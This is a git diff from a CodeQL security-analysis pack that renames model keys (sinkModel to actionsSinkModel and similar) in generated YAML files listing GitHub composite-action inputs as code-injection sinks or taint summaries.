a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index e7c767d2dce1..61210d17abb9 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 7f78690f6396..22dc1a406293 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index ba1beace1704..b2888b571a8a 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] - ["dragonflydb/dragonfly", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index 63085c045d0a..bc188d91f1bb 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] - ["drawpile/drawpile", "*", "input.path", "output.path", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d6ee6c8bb7d2..d5defe67401e 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] - ["eksctl-io/eksctl", "*", "input.email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index 83951f43c635..d97fedbed130 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] - ["elastic/apm-agent-dotnet", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index 397ab0838090..e22c29b09f11 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] - ["elastic/apm-agent-java", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 023abac3631d..7203bb8345c6 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] - ["elastic/apm-server", "*", "input.version", "output.release-branch", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index 5dd069df4990..dcfbb0ea2032 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] - ["elementor/elementor", "*", "input.CHANNEL", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 1a1d763d6e4a..6c5d6edd572c 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index a8e95d304576..fdaee61066ed 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] - ["emqx/emqx", "*", "input.otp", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index 52d085ee4798..d68c4e57c8ad 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] - ["eonasdan/tempus-dominus", "*", "input.NUGET_API_KEY", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 33c56a67cb9b..85a8d2f4d65d 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] - ["erlang/otp", "*", "input.BASE_BRANCH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index 258101eecea4..d22754092787 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] - ["esphome/esphome", "*", "input.suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index d77e05c680bc..4dc0b87214b3 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] - ["expensify/app", "*", "input.PACKAGE_SCRIPT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index db98f8d769af..ea1a8a8afecb 100644 --- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 7607840dbdc7..5ce00c29e52b 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] - ["expo/vscode-expo", "*", "input.semver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index 2fa4f8dfa618..d1f551b66da3 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] - ["external-secrets/external-secrets", "*", "input.image-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 80725157e338..6f8845ec1c0a 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 9d317f14272c..152fdfed4477 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 12deff387bdc..5919ade7e819 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] - ["facebook/yoga", "*", "input.directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index 9c3c242b1ed9..d9afa5bb21fe 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] - ["facebookresearch/xformers", "*", "input.pytorch_channel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 4aa1ce5c4cf9..0b36853a8914 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 6f8ef16ea330..2bd521d42f58 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] - ["felangel/bloc", "*", "input.analyze_directories", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index bc2146921efe..8ae81e706a42 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] - ["firebase/firebase-ios-sdk", "*", "input.sources", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 37e1d0d67a5e..4893772b71ae 100644 --- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index eabd3834b1b7..e174c830a855 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 2253e33b950c..14070215bfa3 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index bc1eb54056af..f3a0b47f2c2c 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] - ["fluxcd/flux2", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 842240cfaa20..12011d643963 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 8ff5ee1e2c0a..40ecb17610eb 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] - ["fossasia/visdom", "*", "input.usebasebranch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 29c5f793fb24..250606588f98 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index 2f12293df0ed..f2f5678b8b8a 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] - ["freeradius/freeradius-server", "*", "input.llvm_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index 83012e513359..b17eb01f8217 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] - ["gaphor/gaphor", "*", "input.base64_encoded_pfx", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 8ca211961948..7ebdde766f3d 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 7f19fd1f6a6f..7f2e1588139e 100644 --- a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/codeql-action", "*", "input.latest_tag", "code-injection", "generated"] - ["github/codeql-action", "*", "input.major_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml index 1889fcff1441..eedeb3844223 100644 --- a/ql/lib/ext/generated/composite-actions/github_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/github_ruby.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["github/ruby", "*", "input.builddir", "code-injection", "generated"] - ["github/ruby", "*", "input.srcdir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml index f8243352f455..fb6fb0267bb9 100644 --- a/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml +++ b/ql/lib/ext/generated/composite-actions/gittools_gitversion.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gittools/gitversion", "*", "input.distro", "code-injection", "generated"] - ["gittools/gitversion", "*", "input.targetFramework", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml index bd2015a70964..60df7484e7f3 100644 --- a/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml +++ b/ql/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-spatial/tegola", "*", "input.artifact_name", "code-injection", "generated"] - ["go-spatial/tegola", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml index 501123a82fe5..d0af7b61f989 100644 --- a/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml +++ b/ql/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goauthentik/authentik", "*", "input.postgresql_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml index 1a17e3db2b8c..8d08848d24c4 100644 --- a/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml +++ b/ql/lib/ext/generated/composite-actions/godotengine_godot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["godotengine/godot", "*", "input.bin", "code-injection", "generated"] - ["godotengine/godot", "*", "input.tests", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml index a125a4bfa8c6..f26f672a586c 100644 --- a/ql/lib/ext/generated/composite-actions/google_dagger.model.yml +++ b/ql/lib/ext/generated/composite-actions/google_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["google/dagger", "*", "input.agp", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml index e8d0cc64792b..5431aad8dca6 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/java-cloud-bom", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml index 736c84b68ccf..92c23f9f1fbd 100644 --- a/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googleapis/sdk-platform-java", "*", "input.bom-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml index 062203945c50..52654194d81e 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml index aedeb4e1023c..43c274aa0337 100644 --- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml +++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["googlecloudplatform/magic-modules", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml index 0d8afb086c94..7f8b87fa20ef 100644 --- a/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml +++ b/ql/lib/ext/generated/composite-actions/gravitational_teleport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gravitational/teleport", "*", "input.target", "code-injection", "generated"] - ["gravitational/teleport", "*", "input.attempts", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml index 4756acbf306f..31422a708c5a 100644 --- a/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml +++ b/ql/lib/ext/generated/composite-actions/grote_transportr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["grote/transportr", "*", "input.api-level", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml index a0e4acec75a0..30ccfdea6318 100644 --- a/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml +++ b/ql/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hashicorp/nomad", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml b/ql/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml index 6acfcf9773f5..9bc22ac93ef0 100644 --- 